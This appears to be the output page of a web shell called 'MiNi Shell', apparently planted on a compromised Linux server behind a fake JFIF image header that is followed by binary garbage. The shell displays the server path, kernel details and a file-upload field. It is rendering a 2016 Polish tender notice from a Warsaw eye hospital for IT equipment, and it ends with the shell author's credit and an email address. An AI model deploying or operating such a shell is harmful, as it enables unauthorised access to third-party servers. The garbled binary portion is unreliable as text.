JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160525/134762-N-2016.html

<p class="kh_header"><b>Warszawa: DOSTAWA KOMPUTERÓW, MONITORÓW, AKCESORIÓW DO SERWERÓW I OPROGRAMOWANIA</b><br>
<b>Numer ogłoszenia: 134762 - 2016; data zamieszczenia: 25.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Kliniczny Szpital Okulistyczny , ul. Józefa Sierakowskiego 13, 03-709 Warszawa, woj. mazowieckie, tel. 022 6187979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spkso.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA KOMPUTERÓW, MONITORÓW, AKCESORIÓW DO SERWERÓW I OPROGRAMOWANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1  Przedmiotem zamówienia jest dostawa do Samodzielnego Publicznego Klinicznego Szpitala    
     Okulistycznego komputerów, monitorów, akcesoriów do serwerów i oprogramowania, 
     w tym:
1)	komputerów stacjonarnych typu (wszystko w jednym) - 14 szt.
2)	komputerów typu desktop - 5 szt.
3)	komputera stacjonarnego typu (wszystko w jednym) - 1 szt.
4)	komputera przenośnego ze stacją dokującą, klawiaturą i myszą bezprzewodową - 1 szt.
5)	monitorów - 7 szt.
6)	półki dyskowej HPE D2600 p/n AJ940A wyposażonej w 12 dysków 6TB p/n 782669-B21 
- 1 szt.
7)	zasilaczy awaryjnych UPS - 4 szt.
8)	zarządzalnego przełącznika sieciowego - 1 szt.
9)	peryferiów do rozbudowy serwerów
10)	oprogramowania Microsoft Office Standard 2016 Academic MOLP - 20 szt.
11)	zestawu narzędzi do naprawy komputerów
12)	półek do szaf RACK 19 - 5 szt.
13)	telewizora 1920x1080 - 1 szt.
    Ponadto Wykonawca zobowiązany jest do:
- udzielenia Zamawiającemu gwarancji na dostarczony sprzęt,
- dostarczenia nośników instalacyjnych,
- przedstawienia deklaracji CE dla każdego zaoferowanego sprzętu,
- zamawiający wymaga aby całość rozwiąż`ania pochodziła od jednego dostawcy-producenta,
- zamawiający wymaga, aby sprzęt i oprogramowanie serwisowane było przez serwis dostawcy znajdujący się na terenie Polski i świadczący usługi w języku polskim,
- zamawiający wymaga, aby całe rozwiązanie pochodziło z oficjalnego kanału dystrybucyjnego producenta na terenie Polski (wymagane oświadczenie producenta).
  2. Szczegółową specyfikację techniczną oraz wymagania dotyczące przedmiotu zamówienia     
       zawiera   załącznik nr 2 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.13.00-0, 30.23.60.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
    posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli   
        przepisy prawa nakładają obowiązek ich posiadania,
 

2. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca   
    złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale III SIWZ, a  
    ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami określonym 
    w SIWZ.
3. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
   
    posiadania wiedzy i doświadczenia,
       Wymagania: 
        a/ Wykonawca musi udokumentować wykonanie w okresie ostatnich trzech lat przed upływem terminu  
            składania ofert co najmniej dwóch zamówień obejmujących dostawę sprzętu komputerowego,  
            licencji oraz urządzeń sieciowych o wartości nie mniejszej niż 200 000 zł brutto każda.
        b/ Wykonawca musi posiadać autoryzację producenta na oferowany sprzęt.
        c/ Wykonawca musi posiadać certyfikat ISO 9001 dla producenta sprzętu
  

2. Wykonawca może polegać na wiedzy i doświadczeniu innych   
    podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w  
    takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi  
    zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby   
    wykonania zamówienia.
3. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt.2, odpowiada solidarnie  
    z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów,    

4. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca   
    złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale III SIWZ, a  
    ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami określonym 
    w SIWZ.
5. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
   
    dysponowania odpowiednim potencjałem technicznym 
   

2. Wykonawca może polegać na  potencjale technicznym innych   
    podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w  
    takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi  
    zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby   
    wykonania zamówienia.
3. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt.2, odpowiada solidarnie  
    z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów,    

4. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca   
    złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale III SIWZ, a  
    ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami określonym 
    w SIWZ.
5. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
 
    dysponowania osobami zdolnymi do  
        wykonania zamówienia,
    

2. Wykonawca może polegać na  osobach   
    zdolnych do wykonania zamówienia  innych   
    podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w  
    takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi  
    zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby   
    wykonania zamówienia.
3. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt.2, odpowiada solidarnie  
    z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów,    

4. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca   
    złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale III SIWZ, a  
    ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami określonym 
    w SIWZ.
5. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
   
    sytuacji ekonomicznej i finansowej.

2. Wykonawca może polegać na  zdolnościach finansowych lub ekonomicznych innych   
    podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w  
    takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi  
    zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby   
    wykonania zamówienia.
3. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z pkt.2, odpowiada solidarnie  
    z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów,    

4. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca   
    złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale III SIWZ, a  
    ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami określonym 
    w SIWZ.
5. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) wypełnione formularze zawierające wymagania odnoszące się do przedmiotu zamówienia  
       stanowiące załącznik nr 2 do SIWZ.
   2) Deklaracje CE dla każdego zaoferowanego sprzętu.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Dokument poświadczający posiadanie autoryzacji producenta na oferowany sprzęt.   
     Dokument powinien być w formie aktualnego certyfikatu autoryzacyjnego lub oświadczenia  
     producenta wystawionego na rzecz Wykonawcy pod kątem prowadzonego postępowania.
2) Certyfikat ISO dla producenta sprzętu komputerowego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95.00</li>
<li>2 - Czas realizacji - 5.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Zmiany w Umowie wymagają zgody obu Stron i muszą być dokonywane w formie  pisemnej,  
        pod rygorem nieważności, z zastrzeżeniem ust. 2. 
2.    Zmiany w umowie mogą być dokonane tylko w następujących przypadkach:
                     1) jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby    
                  połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą, a w    
                  szczególności w przypadku wystąpienia:


a)	gwałtownej dekoniunktury, 
b)	ograniczenia dostępności surowców służących do wykonania przedmiotu umowy,
c)	globalnego wzrostu cen materiałów służących do wykonania przedmiotu umowy,
2)	jeżeli z powodu okoliczności niezawinionych przez żadną ze stron wykonanie przedmiotu   
      umowy w terminie określonym umową, jest niemożliwe lub znacznie utrudnione;
3)	zmiany stanu prawnego którejkolwiek ze stron, niezależnego od jej woli.  
4)	urzędowej zmiany stawek VAT. W takim przypadku zmiana ceny nastąpi z dniem wejścia  
      w życie aktu prawnego zmieniającego stawkę podatku VAT z zachowaniem ceny netto,  
     która pozostaje bez zmian.
5) w przypadku zakończenia produkcji lub wycofania z rynku wyrobu będącego  
     przedmiotem zamówienia dopuszcza się zmianę na nowy produkt o tych samych bądź   
     lepszych parametrach po cenie jednostkowej zaoferowanej w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spkso.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Kliniczny Szpital Okulistyczny - 03-709 Warszawa, ul. Józefa Sierakowskiego 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2016 godzina 10:00, miejsce: Samodzielny Publiczny Kliniczny Szpital Okulistyczny - 03-709 Warszawa, ul. Józefa Sierakowskiego 13 - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com